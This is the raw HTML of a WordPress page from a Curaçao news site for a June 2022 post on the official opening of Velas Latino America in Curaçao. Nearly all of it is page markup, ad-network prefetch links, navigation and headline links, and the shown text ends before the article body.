<!DOCTYPE html>
<html lang="en-US">
<head>
			<meta charset="UTF-8" />
		<meta name="viewport" content="width=device-width, initial-scale=1">
		<link rel="profile" href="http://gmpg.org/xfn/11" />
		
<style id="jetpack-boost-critical-css">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</style><title>Apertura Ofisial Velas Latino America Curacao 2022</title>
<meta name='robots' content='max-image-preview:large' />
<!-- Jetpack Site Verification Tags -->
<link rel='dns-prefetch' href='//secure.gravatar.com' />
<link rel='dns-prefetch' href='//www.googletagmanager.com' />
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel='dns-prefetch' href='//widgets.wp.com' />
<link rel='dns-prefetch' href='//jetpack.wordpress.com' />
<link rel='dns-prefetch' href='//s0.wp.com' />
<link rel='dns-prefetch' href='//public-api.wordpress.com' />
<link rel='dns-prefetch' href='//0.gravatar.com' />
<link rel='dns-prefetch' href='//1.gravatar.com' />
<link rel='dns-prefetch' href='//2.gravatar.com' />
<link rel='dns-prefetch' href='//i0.wp.com' />
<link rel='dns-prefetch' href='//c0.wp.com' />
<link rel='dns-prefetch' href='//s.pubmine.com' />
<link rel='dns-prefetch' href='//x.bidswitch.net' />
<link rel='dns-prefetch' href='//static.criteo.net' />
<link rel='dns-prefetch' href='//ib.adnxs.com' />
<link rel='dns-prefetch' href='//aax.amazon-adsystem.com' />
<link rel='dns-prefetch' href='//bidder.criteo.com' />
<link rel='dns-prefetch' href='//cas.criteo.com' />
<link rel='dns-prefetch' href='//gum.criteo.com' />
<link rel='dns-prefetch' href='//ads.pubmatic.com' />
<link rel='dns-prefetch' href='//gads.pubmatic.com' />
<link rel='dns-prefetch' href='//tpc.googlesyndication.com' />
<link rel='dns-prefetch' href='//ad.doubleclick.net' />
<link rel='dns-prefetch' href='//googleads.g.doubleclick.net' />
<link rel='dns-prefetch' href='//www.googletagservices.com' />
<link rel='dns-prefetch' href='//cdn.switchadhub.com' />
<link rel='dns-prefetch' href='//delivery.g.switchadhub.com' />
<link rel='dns-prefetch' href='//delivery.swid.switchadhub.com' />
<link rel='dns-prefetch' href='//pagead2.googlesyndication.com' />
<link rel="alternate" type="application/rss+xml" title=" &raquo; Feed" href="https://kikotapasando.com/feed/" />
<link rel="alternate" type="application/rss+xml" title=" &raquo; Comments Feed" href="https://kikotapasando.com/comments/feed/" />
<link rel="alternate" type="application/rss+xml" title=" &raquo; Apertura Ofisial Velas Latino America Curacao 2022 Comments Feed" href="https://kikotapasando.com/2022/06/08/apertura-ofisial-velas-latino-america-curacao-2022/feed/" />

<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 0.07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
	<link rel='stylesheet' id='all-css-a9cd34b761fc061decb68db49a8a61ea' href='https://kikotapasando.com/_static/??-eJyVkV1OxDAMhC9ENqxWgPYBcRTkTbxpts6P4lRVb09SCiqBQnnruDOu5+sYhQo+o88y0mCsZ3nDHEH10gU9ELJMSJBRixg4N+qgmO/GKKxXNOjiLVpqy1leKKhekL0kSJPkPBEenPXfAjeWDrUFJHT1iLWIBBMmQWhATbvS5d1arzNtS+4g4dxCBC/GDjJDjPJz9cdk9m0tKaNcvmUSOFGN1psZwXvfjVDLl2yPG5HclR6FaqCQHJh9pgoFjLdXq0q/OMRG/kSl3XEtcxiRg8O5UNViGfxGte02hqRB8/+hzNhLVE9yAftX8rX8OslBWSBBwQT+IvYcXY9cnqv1xT0fHx9O5/Px9HT/BpiINX0=' type='text/css' media='all' />
<style id='wp-block-library-inline-css'>
.has-text-align-justify{text-align:justify;}
</style>
<style id='wp-block-library-theme-inline-css'>
.wp-block-audio figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-audio figcaption{color:hsla(0,0%,100%,.65)}.wp-block-code{border:1px solid #ccc;border-radius:4px;font-family:Menlo,Consolas,monaco,monospace;padding:.8em 1em}.wp-block-embed figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-embed figcaption{color:hsla(0,0%,100%,.65)}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:hsla(0,0%,100%,.65)}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{color:hsla(0,0%,100%,.65)}.wp-block-pullquote{border-top:4px solid;border-bottom:4px solid;margin-bottom:1.75em;color:currentColor}.wp-block-pullquote__citation,.wp-block-pullquote cite,.wp-block-pullquote footer{color:currentColor;text-transform:uppercase;font-size:.8125em;font-style:normal}.wp-block-quote{border-left:.25em solid;margin:0 0 1.75em;padding-left:1em}.wp-block-quote cite,.wp-block-quote footer{color:currentColor;font-size:.8125em;position:relative;font-style:normal}.wp-block-quote.has-text-align-right{border-left:none;border-right:.25em solid;padding-left:0;padding-right:1em}.wp-block-quote.has-text-align-center{border:none;padding-left:0}.wp-block-quote.is-large,.wp-block-quote.is-style-large,.wp-block-quote.is-style-plain{border:none}.wp-block-search .wp-block-search__label{font-weight:700}:where(.wp-block-group.has-background){padding:1.25em 2.375em}.wp-block-separator.has-css-opacity{opacity:.4}.wp-block-separator{border:none;border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){border-bottom:none;height:1px}.wp-block-separator.has-background:not(.is-style-wide):not(.is-style-dots){height:2px}.wp-block-table thead{border-bottom:3px solid}.wp-block-table tfoot{border-top:3px solid}.wp-block-table td,.wp-block-table th{padding:.5em;border:1px solid;word-break:normal}.wp-block-table figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-table figcaption{color:hsla(0,0%,100%,.65)}.wp-block-video figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-video figcaption{color:hsla(0,0%,100%,.65)}.wp-block-template-part.has-background{padding:1.25em 2.375em;margin-top:0;margin-bottom:0}
</style>
<style id='global-styles-inline-css'>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</style>
<noscript><link crossorigin="anonymous" rel='stylesheet' id='colormag_googlefonts-css'  href='//fonts.googleapis.com/css?family=Open+Sans%3A400%2C600&#038;1&#038;display=swap&#038;ver=2.1.2' media='all' />
</noscript><link crossorigin=media="not all" data-media="all" onload="this.media=this.dataset.media; delete this.dataset.media; this.removeAttribute( 'onload' );" rel='stylesheet' id='colormag_googlefonts-css'  href='//fonts.googleapis.com/css?family=Open+Sans%3A400%2C600&#038;1&#038;display=swap&#038;ver=2.1.2' media="not all" data-media="all" onload="this.media=this.dataset.media; delete this.dataset.media; this.removeAttribute( 'onload' );" />
<style id='jetpack-global-styles-frontend-style-inline-css'>
:root { --font-headings: unset; --font-base: unset; --font-headings-default: -apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Oxygen-Sans,Ubuntu,Cantarell,"Helvetica Neue",sans-serif; --font-base-default: -apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Oxygen-Sans,Ubuntu,Cantarell,"Helvetica Neue",sans-serif;}
</style>



<script data-jetpack-boost="ignore" src='https://kikotapasando.com/wp-includes/js/jquery/jquery.min.js?ver=3.6.0' id='jquery-core-js'></script>



<!-- Google Analytics snippet added by Site Kit -->



<!-- End Google Analytics snippet added by Site Kit -->
<link rel="https://api.w.org/" href="https://kikotapasando.com/wp-json/" /><link rel="alternate" type="application/json" href="https://kikotapasando.com/wp-json/wp/v2/posts/277465" /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://kikotapasando.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://kikotapasando.com/wp-includes/wlwmanifest.xml" /> 

<link rel="canonical" href="https://kikotapasando.com/2022/06/08/apertura-ofisial-velas-latino-america-curacao-2022/" />
<link rel='shortlink' href='https://wp.me/p3FP0C-1abf' />
<link rel="alternate" type="application/json+oembed" href="https://kikotapasando.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fkikotapasando.com%2F2022%2F06%2F08%2Fapertura-ofisial-velas-latino-america-curacao-2022%2F" />
<link rel="alternate" type="text/xml+oembed" href="https://kikotapasando.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fkikotapasando.com%2F2022%2F06%2F08%2Fapertura-ofisial-velas-latino-america-curacao-2022%2F&#038;format=xml" />

		<!-- GA Google Analytics @ https://m0n.co/ga -->
		

	<meta name="generator" content="Site Kit by Google 1.75.0" /><style>img#wpstats{display:none}</style>
	<link rel="pingback" href="https://kikotapasando.com/xmlrpc.php">
<!-- Google AdSense snippet added by Site Kit -->
<meta name="google-adsense-platform-account" content="ca-host-pub-2644536267352236">
<meta name="google-adsense-platform-domain" content="sitekit.withgoogle.com">
<!-- End Google AdSense snippet added by Site Kit -->
<link rel="amphtml" href="https://kikotapasando.com/2022/06/08/apertura-ofisial-velas-latino-america-curacao-2022/amp/">			<style type="text/css">
				/* If html does not have either class, do not show lazy loaded images. */
				html:not( .jetpack-lazy-images-js-enabled ):not( .js ) .jetpack-lazy-image {
					display: none;
				}
			</style>
			
		
<!-- Google AdSense snippet added by Site Kit -->


<!-- End Google AdSense snippet added by Site Kit -->
<style>#amp-mobile-version-switcher{left:0;position:absolute;width:100%;z-index:100}#amp-mobile-version-switcher>a{background-color:#444;border:0;color:#eaeaea;display:block;font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:16px;font-weight:600;padding:15px 0;text-align:center;text-decoration:none}#amp-mobile-version-switcher>a:active,#amp-mobile-version-switcher>a:focus,#amp-mobile-version-switcher>a:hover{text-decoration:underline}</style><link rel="alternate" type="text/html" media="only screen and (max-width: 640px)" href="https://kikotapasando.com/2022/06/08/apertura-ofisial-velas-latino-america-curacao-2022/amp/">
<!-- Jetpack Open Graph Tags -->
<meta property="og:type" content="article" />
<meta property="og:title" content="Apertura Ofisial Velas Latino America Curacao 2022" />
<meta property="og:url" content="https://kikotapasando.com/2022/06/08/apertura-ofisial-velas-latino-america-curacao-2022/" />
<meta property="og:description" content="Visit the post for more." />
<meta property="article:published_time" content="2022-06-08T09:37:50+00:00" />
<meta property="article:modified_time" content="2022-06-08T09:37:50+00:00" />
<meta property="og:image" content="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-24-1280x961-1.jpg?fit=1200%2C901&#038;ssl=1" />
<meta property="og:image:width" content="1200" />
<meta property="og:image:height" content="901" />
<meta property="og:image:alt" content="" />
<meta property="og:locale" content="en_US" />
<meta name="twitter:creator" content="@KIKOTAPASANDO" />
<meta name="twitter:site" content="@KIKOTAPASANDO" />
<meta name="twitter:text:title" content="Apertura Ofisial Velas Latino America Curacao 2022" />
<meta name="twitter:image" content="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-24-1280x961-1.jpg?fit=1200%2C901&#038;ssl=1&#038;w=640" />
<meta name="twitter:card" content="summary_large_image" />
<meta name="twitter:description" content="Post by @KIKOTAPASANDO." />

<!-- End Jetpack Open Graph Tags -->
		
				
		<link rel="icon" href="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/04/cropped-Facebook-page-2022-April.jpg?fit=32%2C32&#038;ssl=1" sizes="32x32" />
<link rel="icon" href="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/04/cropped-Facebook-page-2022-April.jpg?fit=192%2C192&#038;ssl=1" sizes="192x192" />
<link rel="apple-touch-icon" href="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/04/cropped-Facebook-page-2022-April.jpg?fit=180%2C180&#038;ssl=1" />
<meta name="msapplication-TileImage" content="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/04/cropped-Facebook-page-2022-April.jpg?fit=270%2C270&#038;ssl=1" />
</head>

<body class="post-template-default single single-post postid-277465 single-format-standard custom-background wp-custom-logo wp-embed-responsive right-sidebar box-layout better-responsive-menu">

<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 0 0" width="0" height="0" focusable="false" role="none" style="visibility: hidden; position: absolute; left: -9999px; overflow: hidden;" ><defs><filter id="wp-duotone-dark-grayscale"><feColorMatrix color-interpolation-filters="sRGB" type="matrix" values=" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 " /><feComponentTransfer color-interpolation-filters="sRGB" ><feFuncR type="table" tableValues="0 0.49803921568627" /><feFuncG type="table" tableValues="0 0.49803921568627" /><feFuncB type="table" tableValues="0 0.49803921568627" /><feFuncA type="table" tableValues="1 1" /></feComponentTransfer><feComposite in2="SourceGraphic" operator="in" /></filter></defs></svg><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 0 0" width="0" height="0" focusable="false" role="none" style="visibility: hidden; position: absolute; left: -9999px; overflow: hidden;" ><defs><filter id="wp-duotone-grayscale"><feColorMatrix color-interpolation-filters="sRGB" type="matrix" values=" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 " /><feComponentTransfer color-interpolation-filters="sRGB" ><feFuncR type="table" tableValues="0 1" /><feFuncG type="table" tableValues="0 1" /><feFuncB type="table" tableValues="0 1" /><feFuncA type="table" tableValues="1 1" /></feComponentTransfer><feComposite in2="SourceGraphic" operator="in" /></filter></defs></svg><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 0 0" width="0" height="0" focusable="false" role="none" style="visibility: hidden; position: absolute; left: -9999px; overflow: hidden;" ><defs><filter id="wp-duotone-purple-yellow"><feColorMatrix color-interpolation-filters="sRGB" type="matrix" values=" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 " /><feComponentTransfer color-interpolation-filters="sRGB" ><feFuncR type="table" tableValues="0.54901960784314 0.98823529411765" /><feFuncG type="table" tableValues="0 1" /><feFuncB type="table" tableValues="0.71764705882353 0.25490196078431" /><feFuncA type="table" tableValues="1 1" /></feComponentTransfer><feComposite in2="SourceGraphic" operator="in" /></filter></defs></svg><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 0 0" width="0" height="0" focusable="false" role="none" style="visibility: hidden; position: absolute; left: -9999px; overflow: hidden;" ><defs><filter id="wp-duotone-blue-red"><feColorMatrix color-interpolation-filters="sRGB" type="matrix" values=" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 " /><feComponentTransfer color-interpolation-filters="sRGB" ><feFuncR type="table" tableValues="0 1" /><feFuncG type="table" tableValues="0 0.27843137254902" /><feFuncB type="table" tableValues="0.5921568627451 0.27843137254902" /><feFuncA type="table" tableValues="1 1" /></feComponentTransfer><feComposite in2="SourceGraphic" operator="in" /></filter></defs></svg><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 0 0" width="0" height="0" focusable="false" role="none" style="visibility: hidden; position: absolute; left: -9999px; overflow: hidden;" ><defs><filter id="wp-duotone-midnight"><feColorMatrix color-interpolation-filters="sRGB" type="matrix" values=" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 " /><feComponentTransfer color-interpolation-filters="sRGB" ><feFuncR type="table" tableValues="0 0" /><feFuncG type="table" tableValues="0 0.64705882352941" /><feFuncB type="table" tableValues="0 1" /><feFuncA type="table" tableValues="1 1" /></feComponentTransfer><feComposite in2="SourceGraphic" operator="in" /></filter></defs></svg><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 0 0" width="0" height="0" focusable="false" role="none" style="visibility: hidden; position: absolute; left: -9999px; overflow: hidden;" ><defs><filter id="wp-duotone-magenta-yellow"><feColorMatrix color-interpolation-filters="sRGB" type="matrix" values=" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 " /><feComponentTransfer color-interpolation-filters="sRGB" ><feFuncR type="table" tableValues="0.78039215686275 1" /><feFuncG type="table" tableValues="0 0.94901960784314" /><feFuncB type="table" tableValues="0.35294117647059 0.47058823529412" /><feFuncA type="table" tableValues="1 1" /></feComponentTransfer><feComposite in2="SourceGraphic" operator="in" /></filter></defs></svg><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 0 0" width="0" height="0" focusable="false" role="none" style="visibility: hidden; position: absolute; left: -9999px; overflow: hidden;" ><defs><filter id="wp-duotone-purple-green"><feColorMatrix color-interpolation-filters="sRGB" type="matrix" values=" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 " /><feComponentTransfer color-interpolation-filters="sRGB" ><feFuncR type="table" tableValues="0.65098039215686 0.40392156862745" /><feFuncG type="table" tableValues="0 1" /><feFuncB type="table" tableValues="0.44705882352941 0.4" /><feFuncA type="table" tableValues="1 1" /></feComponentTransfer><feComposite in2="SourceGraphic" operator="in" /></filter></defs></svg><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 0 0" width="0" height="0" focusable="false" role="none" style="visibility: hidden; position: absolute; left: -9999px; overflow: hidden;" ><defs><filter id="wp-duotone-blue-orange"><feColorMatrix color-interpolation-filters="sRGB" type="matrix" values=" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 " /><feComponentTransfer color-interpolation-filters="sRGB" ><feFuncR type="table" tableValues="0.098039215686275 1" /><feFuncG type="table" tableValues="0 0.66274509803922" /><feFuncB type="table" tableValues="0.84705882352941 0.41960784313725" /><feFuncA type="table" tableValues="1 1" /></feComponentTransfer><feComposite in2="SourceGraphic" operator="in" /></filter></defs></svg>		<div id="page" class="hfeed site">
				<a class="skip-link screen-reader-text" href="#main">Skip to content</a>
				<header id="masthead" class="site-header clearfix ">
				<div id="header-text-nav-container" class="clearfix">
		
			<div class="news-bar">
				<div class="inner-wrap clearfix">
					
		<div class="breaking-news">
			<strong class="breaking-news-latest">Latest:</strong>

			<ul class="newsticker">
									<li>
						<a href="https://kikotapasando.com/2022/06/08/pronostiko-di-tempu-pa-korsou-i-bisindario-balido-te-djaweps-mainta-0600-o-l-9-di-yuni-2022/" title="Pronóstiko di tempu pa Kòrsou i bisindario bálido te djaweps mainta 06:00 o.l., 9 di yüni 2022.">
							Pronóstiko di tempu pa Kòrsou i bisindario bálido te djaweps mainta 06:00 o.l., 9 di yüni 2022.						</a>
					</li>
									<li>
						<a href="https://kikotapasando.com/2022/06/08/karta-pa-presidente-di-parlamento-calmes-parlamento-di-korsou-destina-pa-frakasa-den-11-ana-no-a-ordena-organisa-profeshonalisa-parlamento-pueblo-mester-sa-esaki/" title="Karta pa Presidente di Parlamento: Calmes: &#8220;Parlamento di Kòrsou destiná pa frakasá. Den 11 aña no a ordená, organisá profeshonalisá parlamento. Pueblo mester sa esaki.&#8221;">
							Karta pa Presidente di Parlamento: Calmes: &#8220;Parlamento di Kòrsou destiná pa frakasá. Den 11 aña no a ordená, organisá profeshonalisá parlamento. Pueblo mester sa esaki.&#8221;						</a>
					</li>
									<li>
						<a href="https://kikotapasando.com/2022/06/08/apertura-ofisial-velas-latino-america-curacao-2022/" title="Apertura Ofisial Velas Latino America Curacao 2022">
							Apertura Ofisial Velas Latino America Curacao 2022						</a>
					</li>
									<li>
						<a href="https://kikotapasando.com/2022/06/08/de-drie-deelnemende-tallships-uit-mexico-brazilie-en-uruguay-feestelijk-ontvangen-in-willemstad/" title="De drie deelnemende tallships uit Mexico, Brazilie en Uruguay feestelijk ontvangen in Willemstad.">
							De drie deelnemende tallships uit Mexico, Brazilie en Uruguay feestelijk ontvangen in Willemstad.						</a>
					</li>
									<li>
						<a href="https://kikotapasando.com/2022/06/08/botikario-de-marchena-a-huramenta-serka-minister-dorothy-pietersz-janga/" title="Botikario De Marchena a huramentá serka Minister Dorothy Pietersz- Janga">
							Botikario De Marchena a huramentá serka Minister Dorothy Pietersz- Janga						</a>
					</li>
							</ul>
		</div>

		
		<div class="social-links clearfix">
			<ul>
				<li><a href="#" target="_blank"><i class="fa fa-facebook"></i></a></li><li><a href="#" target="_blank"><i class="fa fa-twitter"></i></a></li><li><a href="http://kikotapasando" target="_blank"><i class="fa fa-instagram"></i></a></li><li><a href="http://Kiko%20Ta%20Pasando" target="_blank"><i class="fa fa-youtube"></i></a></li>			</ul>
		</div><!-- .social-links -->
						</div>
			</div>

			
		<div class="inner-wrap">
			<div id="header-text-nav-wrap" class="clearfix">

				<div id="header-left-section">
											<div id="header-logo-image">
							<a href="https://kikotapasando.com/" class="custom-logo-link" rel="home"><img width="1000" height="400" src="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/website-front-logo.jpg?fit=1000%2C400&amp;ssl=1" class="custom-logo jetpack-lazy-image" alt="" data-attachment-id="276552" data-permalink="https://kikotapasando.com/website-front-logo/" data-orig-file="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/website-front-logo.jpg?fit=1000%2C400&amp;ssl=1" data-orig-size="1000,400" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="website front logo" data-image-description="" data-image-caption="" data-medium-file="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/website-front-logo.jpg?fit=300%2C120&amp;ssl=1" data-large-file="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/website-front-logo.jpg?fit=800%2C320&amp;ssl=1" data-lazy-srcset="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/website-front-logo.jpg?w=1000&amp;ssl=1 1000w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/website-front-logo.jpg?resize=300%2C120&amp;ssl=1 300w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/website-front-logo.jpg?resize=150%2C60&amp;ssl=1 150w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/website-front-logo.jpg?resize=768%2C307&amp;ssl=1 768w" data-lazy-sizes="(max-width: 1000px) 100vw, 1000px" data-lazy-src="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/website-front-logo.jpg?fit=1000%2C400&amp;ssl=1&amp;is-pending-load=1" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" /></a>						</div><!-- #header-logo-image -->
						
					<div id="header-text" class="">
													<h3 id="site-title">
								<a href="https://kikotapasando.com/" title="" rel="home"></a>
							</h3>
						
													<p id="site-description">
								Manda tur loke bo ke pa wordu publika i invitashon pa kubri rueda di prensa na e Email:  kikotapasando@outlook.com							</p><!-- #site-description -->
											</div><!-- #header-text -->
				</div><!-- #header-left-section -->

				<div id="header-right-section">
									</div><!-- #header-right-section -->

			</div><!-- #header-text-nav-wrap -->
		</div><!-- .inner-wrap -->

		
		<nav id="site-navigation" class="main-navigation clearfix" role="navigation">
			<div class="inner-wrap clearfix">
				
									<div class="search-random-icons-container">
													<div class="top-search-wrap">
								<i class="fa fa-search search-top"></i>
								<div class="search-form-top">
									
<form action="https://kikotapasando.com/" class="search-form searchform clearfix" method="get" role="search">

	<div class="search-wrap">
		<input type="search"
		       class="s field"
		       name="s"
		       value=""
		       placeholder="Search"
		/>

		<button class="search-icon" type="submit"></button>
	</div>

</form><!-- .searchform -->
								</div>
							</div>
											</div>
				
				<p class="menu-toggle"></p>
				<div class="menu-primary-container"><ul id="menu-menu-1" class="menu"><li id="menu-item-83280" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-83280"><a href="http://kikotapasando.com">HOME</a></li>
<li id="menu-item-126678" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-126678"><a href="https://kikotapasando.com/category/notisia/">NOTISIA</a></li>
<li id="menu-item-126679" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-126679"><a href="https://kikotapasando.com/category/notisia-polisial/">NOTISIA POLISIAL</a></li>
<li id="menu-item-126680" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-126680"><a href="https://kikotapasando.com/category/gobiernu/">GOBIERNU</a></li>
<li id="menu-item-126681" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-126681"><a href="https://kikotapasando.com/category/pronostiko-di-tempu/">PRONOSTIKO DI TEMPU</a></li>
<li id="menu-item-126683" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-126683"><a href="https://kikotapasando.com/category/deporte/">DEPORTE</a></li>
<li id="menu-item-126682" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-126682"><a href="https://kikotapasando.com/category/farandula-sosial-arte/">FARANDULA</a></li>
<li id="menu-item-126685" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-126685"><a href="https://kikotapasando.com/category/internashonal/">INTERNASHONAL</a></li>
<li id="menu-item-127833" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-127833"><a href="https://kikotapasando.com/category/turismo/">TURISMO</a></li>
</ul></div>
			</div>
		</nav>

				</div><!-- #header-text-nav-container -->
				</header><!-- #masthead -->
				<div id="main" class="clearfix">
				<div class="inner-wrap clearfix">
		
	<div id="primary">
		<div id="content" class="clearfix">

			
<article id="post-277465" class="post-277465 post type-post status-publish format-standard has-post-thumbnail hentry category-notisia">
	
				<div class="featured-image">
									<a href="https://kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-24-1280x961-1.jpg" class="image-popup"><img width="800" height="445" src="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-24-1280x961-1.jpg?resize=800%2C445&amp;ssl=1" class="attachment-colormag-featured-image size-colormag-featured-image wp-post-image jetpack-lazy-image" alt="" data-attachment-id="277473" data-permalink="https://kikotapasando.com/2022/06/08/apertura-ofisial-velas-latino-america-curacao-2022/velas-latinoamerica-24-1280x961/" data-orig-file="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-24-1280x961-1.jpg?fit=1280%2C961&amp;ssl=1" data-orig-size="1280,961" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="Velas Latinoamerica (24) (1280&#215;961)" data-image-description="" data-image-caption="" data-medium-file="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-24-1280x961-1.jpg?fit=300%2C225&amp;ssl=1" data-large-file="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-24-1280x961-1.jpg?fit=800%2C601&amp;ssl=1" data-lazy-src="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-24-1280x961-1.jpg?resize=800%2C445&amp;ssl=1&amp;is-pending-load=1" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" /></a>
								</div>
			
	<div class="article-content clearfix">

		<div class="above-entry-meta"><span class="cat-links"><a href="https://kikotapasando.com/category/notisia/"  rel="category tag">NOTISIA</a>&nbsp;</span></div>
		<header class="entry-header">
			<h1 class="entry-title">
				Apertura Ofisial Velas Latino America Curacao 2022			</h1>
		</header>

		<div class="below-entry-meta">
			<span class="posted-on"><a href="https://kikotapasando.com/2022/06/08/apertura-ofisial-velas-latino-america-curacao-2022/" title="5:37 AM" rel="bookmark"><i class="fa fa-calendar-o"></i> <time class="entry-date published updated" datetime="2022-06-08T05:37:50-04:00">June 8, 2022</time></a></span>
			<span class="byline">
				<span class="author vcard">
					<i class="fa fa-user"></i>
					<a class="url fn n"
					   href="https://kikotapasando.com/author/kikotapasando/"
					   title="REDAKSHON"
					>
						REDAKSHON					</a>
				</span>
			</span>

							<span class="comments">
						<a href="https://kikotapasando.com/2022/06/08/apertura-ofisial-velas-latino-america-curacao-2022/?noamp=mobile#respond"><i class="fa fa-comment"></i> 0 Comments</a>					</span>
				</div>
		<div class="entry-content clearfix">
			<div data-carousel-extra='{"blog_id":1,"permalink":"https:\/\/kikotapasando.com\/2022\/06\/08\/apertura-ofisial-velas-latino-america-curacao-2022\/"}' id='gallery-1' class='gallery galleryid-277465 gallery-columns-1 gallery-size-full'><figure class='gallery-item'>
			<div class='gallery-icon landscape'>
